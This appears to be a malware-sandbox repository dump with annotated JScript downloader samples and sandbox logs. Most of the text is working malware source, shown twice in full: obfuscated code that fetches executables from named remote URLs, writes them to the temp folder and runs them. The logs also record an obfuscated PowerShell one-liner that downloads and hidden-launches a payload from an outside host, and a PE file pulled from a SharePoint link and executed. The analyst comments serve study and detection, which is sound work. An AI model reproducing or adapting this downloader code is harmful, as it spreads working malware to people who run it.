// ckCgnMtxxk(shell, path): shell.Run(path, 1, 0) -- launches the dropped file (window
// style 1, no wait). The two assignments are undeclared globals. Log: "WScript.Shell[9].Run(%TMP%\23.exe, 1, 0)".
12 | function ckCgnMtxxk(ibZdbdKp, CnWtQRBnxBRw) {
13 | nhjyEhX = 0x1;
14 | ScLQeYp = 0x0;
15 | ibZdbdKp.Run(CnWtQRBnxBRw, nhjyEhX, ScLQeYp);
16 | }
// line 17 is filler; line 18 calls a function whose body is commented out (no-op).
17 | /*ToakIoXNFCHbmPvwLmfYFFdfZfhOyyKAhVBlGhbuYuaaPtQBjpqWMUQICukLkzPCPvwfXTyVLfMTKQFAbmUNmdXfyCGAptnxROKUHzooRKSGZhNsmcSyggxwOEwkOhfmmbrBLYyCrirmIspeQMjducrGyzFNHOrVaiscirbJkAkLKwkJOpUBbREKBnhjTpWxiiNxZDYJxM*/
18 | URjKuPKyMgrYr();
// lines 19-22: one download URL per target file name; urls.json in this out/ directory
// records a 404 for both URLs when the sandbox fetched them.
19 | var mmcXR = ["http://lcbschool2.ac.th/pic/_notes/logs.php"];
20 | var Wyiwp = ["http://masseriacarparelli.it/logs2.php"];
21 | OsLAgfHCfdr(mmcXR, '23.exe');
22 | OsLAgfHCfdr(Wyiwp, '24.exe');
23 | 
// OsLAgfHCfdr(urls, name): pick a URL at random, GET it, on HTTP 200 write the body to
// %TMP%\<name>, run it, and stop once a Win32_Process with that name is found.
// RIHh, BIxHp and cvSRFkdY are assigned but never used.
24 | function OsLAgfHCfdr(AUePbmz, xjshqCWtQ) {
25 | var RIHh = 407 - 407;
26 | while (true) {
27 | if (AUePbmz.length <= 366 - 366) break;
// random index into the URL list (xEnVXGW() returns an integer in [100, 100000]).
28 | var EOIT = xEnVXGW() % AUePbmz.length;
29 | var KyRewCCEJ = AUePbmz[EOIT];
30 | var BIxHp = xEnVXGW();
31 | var TlJTxfwLxp = xjshqCWtQ;
32 | var WDlUJfS = xjshqCWtQ;
33 | var cvSRFkdY = 112 - 111;
// lines 34-36: WDBmH picks pieces 0,2,4,5,6 of the '&'-split string -> "WScript.Shell".
34 | var LRACVIJdS = function() {
35 | return new ActiveXObject(WDBmH('WS&WmSxvYpcV&cript&WmSxvYpcV&.She&l&l', [0, 2, 4, 5, 6], '&'));
36 | }();
// line 37: ExpandEnvironmentStrings('%TMP%') + '\' (char 92) + name, i.e. the drop path.
37 | var WDlUJfS = ldNrVl(LRACVIJdS) + String.fromCharCode(92) + WDlUJfS;
// lines 38-40: pieces 0,2,4 -> "MSXML2.XMLHTTP".
38 | var TbZdG = function() {
39 | return new ActiveXObject(WDBmH('MSX&DiODGVvSB&ML2.XM&nmWtwgNOhvP&LHTTP', [0, 2, 4], '&'));
40 | }();
// synchronous GET of the chosen URL (see UYCO below).
41 | UYCO(KyRewCCEJ, TbZdG);
// 100 + 100 == 200: only a successful response is written to disk.
42 | if (TbZdG.status == 100 + 100) {
// lines 43-45: pieces 0,1,3,5 -> "ADODB.Stream".
43 | var sWPmhUM = function() {
44 | return new ActiveXObject(WDBmH('ADO&DB&PGXbbEcUF&.&nEvdrVaCd&Stream', [0, 1, 3, 5], '&'));
45 | }();
46 | var pDdQcrVkhARc = qSeGr(sWPmhUM, TbZdG.ResponseBody, WDlUJfS);
47 | }
48 | try {
// run the dropped path, then ask WMI whether a process of that name now exists; the
// loop only exits here, so a failed download/run keeps the loop going.
49 | ckCgnMtxxk(LRACVIJdS, WDlUJfS);
50 | var xtIxXmh = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \'' + TlJTxfwLxp + '\'');
51 | if (xtIxXmh.Count >= 1) {
52 | break;
53 | }
// NOTE(review): the util_log(_sc + _inspect(e)) bodies in the catch blocks (here and at
// lines 75 and 84) look like the sandbox's instrumentation of otherwise-empty catches --
// its later logs on this page mention "reporting silent catches" -- rather than part of
// the original sample; confirm against the .js in the sample directory.
54 | } catch(e) { util_log(_sc + _inspect(e));}
55 | RIHh++;
// MBGwN is never declared, so this statement throws a ReferenceError on the first pass.
// The log above records exactly that (its line 67, at :56:9) and the run ends there, so
// in that run the second call on line 22 never executes. wmis.json in out/ does list
// queries for both '23.exe' and '24.exe', presumably from a later run.
56 | MBGwN.splice(EOIT, 327 - 326);
57 | }
58 | }
59 | 
// ldNrVl(shell): shell.ExpandEnvironmentStrings('%TMP%'), with the method name hidden in an array.
60 | function ldNrVl(ByNmjV) {
61 | var cxeVjMWm = ["ExpandEnvironmentStrings"];
62 | return ByNmjV[cxeVjMWm[0]]('%TMP%')
63 | }
64 | 
// qSeGr(stream, body, path): open, type = 1, write(body), position = 0, saveToFile(path, 2),
// close; returns the stream size (KlpoACZP is an undeclared global). Detection: a script
// host writing an ADODB.Stream into %TMP% right after an XMLHTTP response.
65 | function qSeGr(fVDGQccj, Cmwwv, JCtZgNyuNT) {
66 | try {
67 | fVDGQccj.open();
68 | mEvJHgAm(fVDGQccj);
69 | ShSvKwv(fVDGQccj, Cmwwv);
70 | EXncmYqiN(fVDGQccj);
71 | SAxs(fVDGQccj, JCtZgNyuNT);
72 | KlpoACZP = fVDGQccj.size;
73 | wcAPLEY(fVDGQccj);
74 | return KlpoACZP;
75 | } catch(e) { util_log(_sc + _inspect(e));}
76 | }
77 | 
// UYCO(url, xhr): pieces 0,2,3 of the '*'-split string spell "GET"; synchronous open,
// then send. The fixed User-Agent "Python-urllib/3.1" (also in urls.json) is a usable
// network indicator: it does not match the IE/WinHTTP agents a script host would send.
78 | function UYCO(pEjdKZ, EZDobvT) {
79 | try {
80 | bkIe = 'G*tqEiSfCEFO*E*T*sqkdtRMjxeQR'.split('*');
81 | EZDobvT.open(bkIe[0] + bkIe[2] + bkIe[3], pEjdKZ, false);
82 | EZDobvT.setRequestHeader("User-Agent", "Python-urllib/3.1");
83 | EZDobvT.send();
84 | } catch(e) { util_log(_sc + _inspect(e));}
85 | }
86 | 
// WDBmH(str, indexes, sep): split str on sep, concatenate the pieces at the given indexes
// after a fixed 'isR' prefix, then strip the three prefix characters. All locals are
// undeclared globals.
87 | function WDBmH(mxhXCKNI, zTOiBb, woGPxsmnc) {
88 | nymYF = mxhXCKNI.split(woGPxsmnc);
89 | VvdgKnq = 'isR';
90 | for (ltaWmxhr = 0; ltaWmxhr < zTOiBb.length; ltaWmxhr++) {
91 | VvdgKnq += nymYF[zTOiBb[ltaWmxhr]];
92 | }
93 | return VvdgKnq.substring(3, VvdgKnq.length);
94 | }
95 | 
// no-op: the only statement (a WScript.Sleep) is commented out.
96 | function URjKuPKyMgrYr() { /*BCKSGFxZTW().Sleep(5311-410);*/ }
97 | 
// YEPOLKB(): Math.random() via a computed property name.
98 | function YEPOLKB() {
99 | var NIZqdP = ["random"];
100 | return Math[NIZqdP[0]]()
101 | }
102 | 
// iPtA: stream.open(); not called anywhere in this listing.
103 | function iPtA(EVWlhq) {
104 | EVWlhq.open();
105 | }
106 | 
// mEvJHgAm: stream.type = 1 (binary), as the sandbox's ADODB_Stream logs show.
107 | function mEvJHgAm(XPaMCcbtn) {
108 | XPaMCcbtn.type = 1;
109 | }
110 | 
// ShSvKwv: stream.write(body).
111 | function ShSvKwv(UBBO, aRAhF) {
112 | UBBO.write(aRAhF);
113 | }
114 | 
// BCKSGFxZTW: returns WScript; only referenced from the commented-out Sleep on line 96.
115 | function BCKSGFxZTW() {
116 | return /*XQRmBOFMbTPjQDAMKQpicfpILteYagMoPpTqwtDpMrwYdHDBnmBJHHxIfOUkXgZzcIpnLSVMQJxHJEZjjChdGcYCTcfpoaFEIVeetkGco*/ WScript;
117 | }
118 | 
// EXncmYqiN: stream.position = 0 ([].length * anything is 0).
119 | function EXncmYqiN(hbpFEH) {
120 | var pOTTAMeVOw = [];
121 | hbpFEH.position = pOTTAMeVOw.length * (4714679 - 679);
122 | }
123 | 
// SAxs: stream.saveToFile(path, 2).
124 | function SAxs(nTrxTKR, kQmMEIk) {
125 | nTrxTKR.saveToFile(kQmMEIk, 2);
126 | }
127 | 
// wcAPLEY: stream.close().
128 | function wcAPLEY(NZHgp) {
129 | NZHgp.close();
130 | }
131 | 
// xEnVXGW(): Math.round(random * (100000 - 100) + 100), an integer in [100, 100000].
132 | function xEnVXGW() {
133 | var AzTJ = 99999 + 1;
134 | var vaVlYa = 100;
135 | return Math.round(YEPOLKB() * (AzTJ - vaVlYa) + vaVlYa);
136 | }
137 | 
// QOawkeUO(n): random alphabetic string builder; QvLxV is never declared and the function
// is never called in this listing.
138 | function QOawkeUO(iqwZo) {
139 | var maBHbxuS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
140 | for (var xfbbJ = 0; xfbbJ < iqwZo; xfbbJ++) {
141 | QvLxV += maBHbxuS.charAt(Math.floor(Math.random() * maBHbxuS.length));
142 | }
143 | return QvLxV;
144 | }
145 | 
// xfgtzigMYScAlH(progId): new ActiveXObject(progId); not called in this listing.
146 | function xfgtzigMYScAlH(XVdzyJUSJbBLjI) {
147 | return new ActiveXObject(XVdzyJUSJbBLjI);
148 | }
149 | -------------------------------------------------------------------------------- /malware/20161013/out/tr_malware_20161013__TMP__XipXkrLd.js: -------------------------------------------------------------------------------- 
// analyst note: as rendered on this page this tr_ copy is the same script as the
// malware_20161013__TMP__XipXkrLd.js listing above; see the annotations there.
1 | "Thu Oct 13 2016 23:47:13 GMT+0200 (CEST)"
2 | var SvjUKAc = new Date();
3 | while (true) {
4 | var XwHvxGz = new Date();
5 | var ERupxfq = new Date(XwHvxGz.getTime() - SvjUKAc.getTime());
6 | if (ERupxfq.getSeconds() > 5) {
7 | break;
8 | }
9 | WScript.Sleep(500);
10 | }
11 | 
12 | function ckCgnMtxxk(ibZdbdKp, CnWtQRBnxBRw) {
13 | nhjyEhX = 0x1;
14 | ScLQeYp = 0x0;
15 | ibZdbdKp.Run(CnWtQRBnxBRw, nhjyEhX, ScLQeYp);
16 | }
17 | /*ToakIoXNFCHbmPvwLmfYFFdfZfhOyyKAhVBlGhbuYuaaPtQBjpqWMUQICukLkzPCPvwfXTyVLfMTKQFAbmUNmdXfyCGAptnxROKUHzooRKSGZhNsmcSyggxwOEwkOhfmmbrBLYyCrirmIspeQMjducrGyzFNHOrVaiscirbJkAkLKwkJOpUBbREKBnhjTpWxiiNxZDYJxM*/
18 | URjKuPKyMgrYr();
19 | var mmcXR = ["http://lcbschool2.ac.th/pic/_notes/logs.php"];
20 | var Wyiwp = ["http://masseriacarparelli.it/logs2.php"];
21 | OsLAgfHCfdr(mmcXR, '23.exe');
22 | OsLAgfHCfdr(Wyiwp, '24.exe');
23 | 
24 | function OsLAgfHCfdr(AUePbmz, xjshqCWtQ) {
25 | var RIHh = 407 - 407;
26 | while (true) {
27 | if (AUePbmz.length <= 366 - 366) break;
28 | var EOIT = xEnVXGW() % AUePbmz.length;
29 | var KyRewCCEJ = AUePbmz[EOIT];
30 | var BIxHp = xEnVXGW();
31 | var TlJTxfwLxp = xjshqCWtQ;
32 | var WDlUJfS = xjshqCWtQ;
33 | var cvSRFkdY = 112 - 111;
34 | var LRACVIJdS = function() {
35 | return new ActiveXObject(WDBmH('WS&WmSxvYpcV&cript&WmSxvYpcV&.She&l&l', [0, 2, 4, 5, 6], '&'));
36 | }();
37 | var WDlUJfS = ldNrVl(LRACVIJdS) + String.fromCharCode(92) + WDlUJfS;
38 | var TbZdG = function() {
39 | return new ActiveXObject(WDBmH('MSX&DiODGVvSB&ML2.XM&nmWtwgNOhvP&LHTTP', [0, 2, 4], '&'));
40 | }();
41 | UYCO(KyRewCCEJ, TbZdG);
42 | if (TbZdG.status == 100 + 100) {
43 | var sWPmhUM = function() {
44 | return new ActiveXObject(WDBmH('ADO&DB&PGXbbEcUF&.&nEvdrVaCd&Stream', [0, 1, 3, 5], '&'));
45 | }();
46 | var pDdQcrVkhARc = qSeGr(sWPmhUM, TbZdG.ResponseBody, WDlUJfS);
47 | }
48 | try {
49 | ckCgnMtxxk(LRACVIJdS, WDlUJfS);
50 | var xtIxXmh = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \'' + TlJTxfwLxp + '\'');
51 | if (xtIxXmh.Count >= 1) {
52 | break;
53 | }
54 | } catch(e) { util_log(_sc + _inspect(e));}
55 | RIHh++;
56 | MBGwN.splice(EOIT, 327 - 326);
57 | }
58 | }
59 | 
60 | function ldNrVl(ByNmjV) {
61 | var cxeVjMWm = ["ExpandEnvironmentStrings"];
62 | return ByNmjV[cxeVjMWm[0]]('%TMP%')
63 | }
64 | 
65 | function qSeGr(fVDGQccj, Cmwwv, JCtZgNyuNT) {
66 | try {
67 | fVDGQccj.open();
68 | mEvJHgAm(fVDGQccj);
69 | ShSvKwv(fVDGQccj, Cmwwv);
70 | EXncmYqiN(fVDGQccj);
71 | SAxs(fVDGQccj, JCtZgNyuNT);
72 | KlpoACZP = fVDGQccj.size;
73 | wcAPLEY(fVDGQccj);
74 | return KlpoACZP;
75 | } catch(e) { util_log(_sc + _inspect(e));}
76 | }
77 | 
78 | function UYCO(pEjdKZ, EZDobvT) {
79 | try {
80 | bkIe = 'G*tqEiSfCEFO*E*T*sqkdtRMjxeQR'.split('*');
81 | EZDobvT.open(bkIe[0] + bkIe[2] + bkIe[3], pEjdKZ, false);
82 | EZDobvT.setRequestHeader("User-Agent", "Python-urllib/3.1");
83 | EZDobvT.send();
84 | } catch(e) { util_log(_sc + _inspect(e));}
85 | }
86 | 
87 | function WDBmH(mxhXCKNI, zTOiBb, woGPxsmnc) {
88 | nymYF = mxhXCKNI.split(woGPxsmnc);
89 | VvdgKnq = 'isR';
90 | for (ltaWmxhr = 0; ltaWmxhr < zTOiBb.length; ltaWmxhr++) {
91 | VvdgKnq += nymYF[zTOiBb[ltaWmxhr]];
92 | }
93 | return VvdgKnq.substring(3, VvdgKnq.length);
94 | }
95 | 
96 | function URjKuPKyMgrYr() { /*BCKSGFxZTW().Sleep(5311-410);*/ }
97 | 
98 | function YEPOLKB() {
99 | var NIZqdP = ["random"];
100 | return Math[NIZqdP[0]]()
101 | }
102 | 
103 | function iPtA(EVWlhq) {
104 | EVWlhq.open();
105 | }
106 | 
107 | function mEvJHgAm(XPaMCcbtn) {
108 | XPaMCcbtn.type = 1;
109 | }
110 | 
111 | function ShSvKwv(UBBO, aRAhF) {
112 | UBBO.write(aRAhF);
113 | }
114 | 
115 | function BCKSGFxZTW() {
116 | return /*XQRmBOFMbTPjQDAMKQpicfpILteYagMoPpTqwtDpMrwYdHDBnmBJHHxIfOUkXgZzcIpnLSVMQJxHJEZjjChdGcYCTcfpoaFEIVeetkGco*/ WScript;
117 | }
118 | 
119 | function EXncmYqiN(hbpFEH) {
120 | var pOTTAMeVOw = [];
121 | hbpFEH.position = pOTTAMeVOw.length * (4714679 - 679);
122 | }
123 | 
124 | function SAxs(nTrxTKR, kQmMEIk) {
125 | nTrxTKR.saveToFile(kQmMEIk, 2);
126 | }
127 | 
128 | function wcAPLEY(NZHgp) {
129 | NZHgp.close();
130 | }
131 | 
132 | function xEnVXGW() {
133 | var AzTJ = 99999 + 1;
134 | var vaVlYa = 100;
135 | return Math.round(YEPOLKB() * (AzTJ - vaVlYa) + vaVlYa);
136 | }
137 | 
138 | function QOawkeUO(iqwZo) {
139 | var maBHbxuS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
140 | for (var xfbbJ = 0; xfbbJ < iqwZo; xfbbJ++) {
141 | QvLxV += maBHbxuS.charAt(Math.floor(Math.random() * maBHbxuS.length));
142 | }
143 | return QvLxV;
144 | }
145 | 
146 | function xfgtzigMYScAlH(XVdzyJUSJbBLjI) {
147 | return new ActiveXObject(XVdzyJUSJbBLjI);
148 | }
149 | 
-------------------------------------------------------------------------------- /malware/20161013/out/urls.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "url": "http://lcbschool2.ac.th/pic/_notes/logs.php", 4 | "method": "GET", 5 | "request_headers": "Python-urllib/3.1", 6 | "status": 404, 7 | "response_headers": "{\"date\":\"Mon, 16 Apr 2018 23:07:58 GMT\",\"server\":\"Apache/2\",\"content-length\":\"336\",\"connection\":\"close\",\"content-type\":\"text/html; charset=iso-8859-1\"}", 8 | "response_body": "??404 Not Found??

Not Found

?

The requested URL /pic/_notes/logs.php was not found on this server.

?

Additionally, a 404 Not Found?error was encou ... (truncated)", 9 | "statustext": "OK" 10 | }, 11 | { 12 | "url": "http://masseriacarparelli.it/logs2.php", 13 | "method": "GET", 14 | "request_headers": "Python-urllib/3.1", 15 | "status": 404, 16 | "response_headers": "{\"date\":\"Mon, 16 Apr 2018 23:07:59 GMT\",\"server\":\"Apache\",\"content-length\":\"207\",\"connection\":\"close\",\"content-type\":\"text/html; charset=iso-8859-1\"}", 17 | "response_body": "??404 Not Found??

Not Found

?

The requested URL /logs2.php was not found on this server.

??", 18 | "statustext": "OK" 19 | } 20 | ] -------------------------------------------------------------------------------- /malware/20161013/out/wmis.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "arguments": { 4 | "0": "Select * from Win32_Process Where Name = '23.exe'" 5 | }, 6 | "return": "Collection[21]" 7 | }, 8 | { 9 | "arguments": { 10 | "0": "Select * from Win32_Process Where Name = '24.exe'" 11 | }, 12 | "return": "Collection[29]" 13 | } 14 | ] -------------------------------------------------------------------------------- /malware/20161019/7698627e91bd2db3853b9604b710df43deadea9883ae97468a53d20a9601f2d1.out: -------------------------------------------------------------------------------- 1 | 19 Oct 23:02:30 - mailware-jail, a malware sandbox ver. 0.8 2 | 19 Oct 23:02:30 - ------------------------ 3 | 19 Oct 23:02:30 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/other.js,env/console.js 4 | 19 Oct 23:02:30 - Malware files: malware/20161019/7698627e91bd2db3853b9604b710df43deadea9883ae97468a53d20a9601f2d1.js 5 | 19 Oct 23:02:30 - Output file for sandbox dump: sandbox_dump_after.json 6 | 19 Oct 23:02:30 - Output directory for generated files: output/ 7 | 19 Oct 23:02:30 - ==> Preparing Sandbox environment. 8 | 19 Oct 23:02:30 - => Executing: env/utils.js 9 | 19 Oct 23:02:30 - => Executing: env/eval.js 10 | 19 Oct 23:02:30 - Preparing sandbox to intercept eval() calls. 11 | 19 Oct 23:02:30 - => Executing: env/function.js 12 | 19 Oct 23:02:30 - Preparing sandbox to intercept 'new Function()' calls. 13 | 19 Oct 23:02:30 - => Executing: env/wscript.js 14 | 19 Oct 23:02:30 - Preparing sandbox to emulate WScript environment. 15 | 19 Oct 23:02:30 - => Executing: env/other.js 16 | 19 Oct 23:02:30 - => Executing: env/console.js 17 | 19 Oct 23:02:30 - ==> Executing malware file(s). 
18 | 19 Oct 23:02:30 - => Executing: malware/20161019/7698627e91bd2db3853b9604b710df43deadea9883ae97468a53d20a9601f2d1.js 19 | 19 Oct 23:02:30 - ActiveXObject(WScript.Shell) 20 | 19 Oct 23:02:30 - Created: WScript.Shell[1] 21 | 19 Oct 23:02:30 - WScript.Shell[1].Run(cmD.exe /c pOWersh^e^Ll.^eXe^ -exe^c^Uti^oN^pO^lic^Y ^bYpaSs^ -n^OPRo^fIle^ -w^IN^D^Ows^Ty^Le h^IDDen (^neW-Obj^ec^T S^y^St^e^M^.ne^T.^we^Bc^L^ieNt)^.DoW^N^Loa^dFi^le('http://www.cambridgeok.top/user.php?f=1.dat','%apPdaTa%.eXe');^S^Tart-Pro^ce^ss^ %aPPdata%.eXe, 0, undefined) 22 | 19 Oct 23:02:30 - ==> Cleaning up sandbox. 23 | 19 Oct 23:02:30 - ==> Script execution finished, dumping sandbox environment to a file. 24 | 19 Oct 23:02:30 - The sandbox context has been saved to: sandbox_dump_after.json 25 | -------------------------------------------------------------------------------- /malware/20161022/ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.out: -------------------------------------------------------------------------------- 1 | 21 Nov 23:11:18 - mailware-jail, a malware sandbox ver. 0.10 2 | 21 Nov 23:11:18 - ------------------------ 3 | 21 Nov 23:11:18 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 21 Nov 23:11:18 - Malware files: malware/20161022/ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js 5 | 21 Nov 23:11:18 - Output file for sandbox dump: sandbox_dump_after.json 6 | 21 Nov 23:11:18 - Output directory for generated files: output/ 7 | 21 Nov 23:11:18 - ==> Preparing Sandbox environment. 
8 | 21 Nov 23:11:18 - => Executing: env/utils.js quitely 9 | 21 Nov 23:11:18 - => Executing: env/eval.js quitely 10 | 21 Nov 23:11:18 - => Executing: env/function.js quitely 11 | 21 Nov 23:11:18 - => Executing: env/wscript.js quitely 12 | 21 Nov 23:11:18 - => Executing: env/browser.js quitely 13 | 21 Nov 23:11:18 - => Executing: env/agents.js quitely 14 | 21 Nov 23:11:18 - => Executing: env/other.js quitely 15 | 21 Nov 23:11:18 - => Executing: env/console.js quitely 16 | 21 Nov 23:11:18 - ==> Executing malware file(s). ========================================= 17 | 21 Nov 23:11:18 - => Executing: malware/20161022/ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js verbosely, reporting silent catches 18 | 21 Nov 23:11:18 - Saving: output/malware_20161022_ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js 19 | 21 Nov 23:11:19 - ActiveXObject(WScript.Shell) 20 | 21 Nov 23:11:19 - new WScript.Shell[9] 21 | 21 Nov 23:11:19 - WScript.Shell[9].ExpandEnvironmentStrings(%TEMP%/vbNU_w19.exe) 22 | 21 Nov 23:11:19 - ActiveXObject(MSXML2.XMLHTTP) 23 | 21 Nov 23:11:19 - new MSXML2.XMLHTTP[10] 24 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].onreadystatechange = (undefined) 'undefined' 25 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].open(GET,https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1,0) 26 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].method = (string) 'GET' 27 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].url = (string) 'https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1' 28 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].async = (boolean) 'false' 29 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].async.get() => (boolean) 'false' 30 | 21 Nov 23:11:19 - 
MSXML2.XMLHTTP[10].send(undefined) 31 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].method.get() => (string) 'GET' 32 | 21 Nov 23:11:19 - MSXML2.XMLHTTP[10].url.get() => (string) 'https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1' 33 | 21 Nov 23:11:20 - sync_req: MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated) 34 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].status = (number) '200' 35 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].readystate = (number) '4' 36 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].statustext = (string) 'OK' 37 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)' 38 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].allresponseheaders = (string) '{"cache-control":"private","content-length":"120808","content-type":"application/pdf","accept-ranges":"bytes","etag":"\"{C192762E-1490-49C5-831F-008A9B492FA8},1\"","server":"Microsoft-IIS/8.5","x-sharepointhealthscore":"0","x-download-options":"noope ... 
(truncated)' 39 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].onreadystatechange.get() => (undefined) 'undefined' 40 | 21 Nov 23:11:20 - 1: readystate 41 | 21 Nov 23:11:20 - 2: 4 42 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].readystate.get() => (number) '4' 43 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].statustext.get() => (string) 'OK' 44 | 21 Nov 23:11:20 - 5: statusText 45 | 21 Nov 23:11:20 - 6: OK 46 | 21 Nov 23:11:20 - ActiveXObject(ADODB.Stream) 47 | 21 Nov 23:11:20 - new ADODB_Stream[11] 48 | 21 Nov 23:11:20 - ADODB_Stream[11].Open() 49 | 21 Nov 23:11:20 - ADODB_Stream[11].type = (number) '1' 50 | 21 Nov 23:11:20 - MSXML2.XMLHTTP[10].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)' 51 | 21 Nov 23:11:20 - ADODB_Stream[11].content = (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)' 52 | 21 Nov 23:11:20 - ADODB_Stream[11].Write(str) - 120808 bytes 53 | 21 Nov 23:11:20 - ADODB_Stream[11].size = (number) '120808' 54 | 21 Nov 23:11:20 - ADODB_Stream[11].position = (number) '0' 55 | 21 Nov 23:11:20 - ADODB_Stream[11].SaveToFile(%TEMP%/vbNU_w19.exe, 2) 56 | 21 Nov 23:11:20 - ADODB_Stream[11].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... 
(truncated)' 57 | 21 Nov 23:11:20 - ADODB_Stream[11].Close() 58 | 21 Nov 23:11:20 - WScript.Shell[9].Run(%TEMP%/vbNU_w19.exe, 0, 0) 59 | 21 Nov 23:11:20 - ==> Cleaning up sandbox. 60 | 21 Nov 23:11:20 - ==> Script execution finished, dumping sandbox environment to a file. 61 | 21 Nov 23:11:20 - The sandbox context has been saved to: sandbox_dump_after.json 62 | 21 Nov 23:11:20 - Saving: output/_TEMP__vbNU_w19.exe 63 | -------------------------------------------------------------------------------- /malware/20161210/24c314dcfdfbfe984e7ca9e83a96f0aea1ac37cf92eab609f8d4916e6cde299e.js: -------------------------------------------------------------------------------- 
// analyst note: JScript downloader. Every string is split into 1-4 character fragments
// (lines 2-108), glued back into COM ProgIDs, method names and a URL (lines 109-139), and
// the real work -- XMLHTTP GET, ADODB.Stream to the temp folder, cmd.exe /c <file>,
// then self-delete -- is lines 140-157. The resolved names noted below are obtained by
// concatenating the fragments as the code does; no sandbox .out for this sample is on
// this page.
// line 1: sapasgo() returns element 0 of the array it is called on, so each
// [x, "-", ...].sapasgo() below is just x; the "-" entries are padding. It is built with
// new Function(), which the sandbox's env/function.js hook intercepts (see the log
// headers on this page).
1 | Array.prototype.sapasgo = new Function("return this[0];");
2 | var zedrotivl0 = ["Posi", "-", "-"].sapasgo();
3 | var vonybfonp = ["GET", "-", "-", "-"].sapasgo();
4 | var zahzonun6 = ["rn A", "-", "-"].sapasgo();
5 | var fewlojohy0 = ['e', "-"].sapasgo();
6 | var zaltikihp = ["e", "-", "-"].sapasgo();
7 | var uvcemveryz = ["cia", "-", "-"].sapasgo();
8 | var qjeczerhasy = ["Scr", "-", "-"].sapasgo();
9 | var oklepewyv2 = ["hel", "-", "-", "-"].sapasgo();
10 | var lcowenbism1 = ["r", "-", "-", "-"].sapasgo();
11 | var avxutqimgilp5 = ['Get', "-", "-", "-"].sapasgo();
12 | var boneqe0 = ["Spe", "-", "-"].sapasgo();
13 | var arlynsyhgyz = ['Abs', "-"].sapasgo();
14 | var okotict0 = ['len', "-", "-"].sapasgo();
15 | var ywtaxnatni2 = ["n", "-"].sapasgo();
16 | var elbibogab = ["olt", "-"].sapasgo();
17 | var asvycyhvuz4 = ["ToFi", "-", "-"].sapasgo();
18 | var alehyvpa = ["1", "-"].sapasgo();
19 | var iccakbyjm0 = ["ct", "-", "-"].sapasgo();
20 | var kimzymgi = ["/ww", "-", "-", "-"].sapasgo();
21 | var cykkiwo1 = ['run', "-"].sapasgo();
22 | var tygorgoqo7 = ["ream", "-", "-"].sapasgo();
23 | var wexquzranvy = ['lFo', "-", "-", "-"].sapasgo();
24 | var cevymsada5 = [".Fi", "-", "-"].sapasgo();
25 | var bdufupvod = ["les", "-"].sapasgo();
26 | var izywmuhlaq0 = ['seB', "-", "-", "-"].sapasgo();
27 | var suqyztizv1 = [".Fi", "-", "-"].sapasgo();
28 | var oshydzihy1 = ['pNa', "-", "-"].sapasgo();
29 | var zjifizu = ["MLHT", "-", "-", "-"].sapasgo();
